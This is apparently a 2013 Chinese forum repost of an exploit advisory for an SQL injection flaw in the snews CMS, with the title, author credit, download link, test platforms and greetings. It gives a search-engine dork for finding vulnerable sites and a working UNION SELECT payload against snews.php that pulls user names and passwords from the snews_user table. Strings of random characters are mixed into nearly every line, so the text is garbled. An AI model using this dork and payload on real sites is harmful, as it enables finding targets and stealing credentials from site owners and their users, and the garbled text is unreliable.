标题: CMS snews SQL Injection Vulnerability# g) V# ~( m( x4 d
作者: By onestree, W$ |0 z* a6 n `
下载地址 : http://snewscms.com/
: L! N% I# T; u: `. m/ }测试平台 : ubuntu 12.10 / win 7
5 Z, ~* ^" S5 d1 R" T# R5 i8 X关键词: inurl:"tanyakan pada rumput yang bergoyang"
% \4 {8 Y$ g# Y$ v, _
9 D0 y" D. k4 V1 s4 f
4 n( t# M/ V; x& Y9 ^& g*************************************************************) }0 z" H- i# |( i! ?: x0 ^- i
! A& S e3 [. y+ ]$ A3 u
SQL poc:7 F- }8 a2 U/ Z7 {9 F
. t5 V% r( w5 J( Q7 N4 J, @) g' x5 dhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
3 L+ B- M( F, y: o
# e. p" B7 Q& |- @+ T+ T" H- e示例 \& P0 [# C3 Y; s# S, U
- J' @2 i, r! y9 S( I6 ihttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*7 s# T0 ]/ d3 `; n
5 b8 {) g; ~/ T# V- z* \. L
9 W2 H& D4 f8 C
致谢:
% _& U+ z2 w# r: ?8 Z1 C6 _
1 i. [# Z/ v7 y" L$ ? Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
8 q" U5 e) o' k* i# \
/ R! s1 E& h' u. d4 @ indonesiancoder - moeslimh4x0r - go-coder+ E2 _0 h1 q: a
0 M4 ] {2 C. k+ u0 E5 a4 [ B4 tspesial my hunny :*
; d2 z5 K* d( S4 z% A |
发表于 2013-1-23 08:55:06
收藏
支持
反对